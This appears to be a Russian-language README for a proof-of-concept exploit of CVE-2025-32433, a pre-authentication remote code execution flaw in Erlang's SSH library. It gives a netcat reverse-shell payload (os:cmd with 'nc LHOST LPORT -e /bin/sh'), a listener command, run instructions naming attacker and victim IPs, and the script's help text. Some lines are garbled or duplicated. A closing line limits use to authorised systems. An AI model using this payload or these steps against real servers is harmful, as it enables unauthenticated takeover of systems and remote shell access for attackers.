
Эксплойт концептуального доказательства для CVE-2025-32433, критической уязвимости в библиотеке SSH языка Erlang, которая позволяет выполнение кода до аутентификации через некорректные пакеты SSH_MSG_CHANNEL_REQUEST.
Доказательство концепции эксплуатации CVE-2025-32433, критической уязвимости в библиотеке Erlang SSH, позволяющей выполнение кода до аутентификации с помощью специально сформированных пакетов SSH_MSG_CHANNEL_REQUEST.
argparseos:cmd("nc LHOST LPORT -e /bin/sh").nc (Netcat) на вашей атакующей машине22)Запустите прослушиватель на атакующей машине:
nc -lvnp 4444
Запустите эксплойт:
python3 CVE-2025-32433.py -lh [IP-атакующего] -lp [Порт-атакующего] -rh [IP-жертвы] -rp [Порт-жертвы]
Дождитесь подключения оболочки к вашему прослушивателю.
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell
optional arguments:
-h, --help show this help message and exit
-lh LHOST, --lhost LHOST
Local host/IP to receive the reverse shell
-lp LPORT, --lport LPORT
Local port to receive the reverse shell
-rh RHOST, --rhost RHOST
Target SSH server IP (default: 10.10.248.101)
-rp RPORT, --rport RPORT
Target SSH server port (default: 22)
Используйте этот код только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Несанкционированная эксплуатация уязвимостей незаконна и неэтична.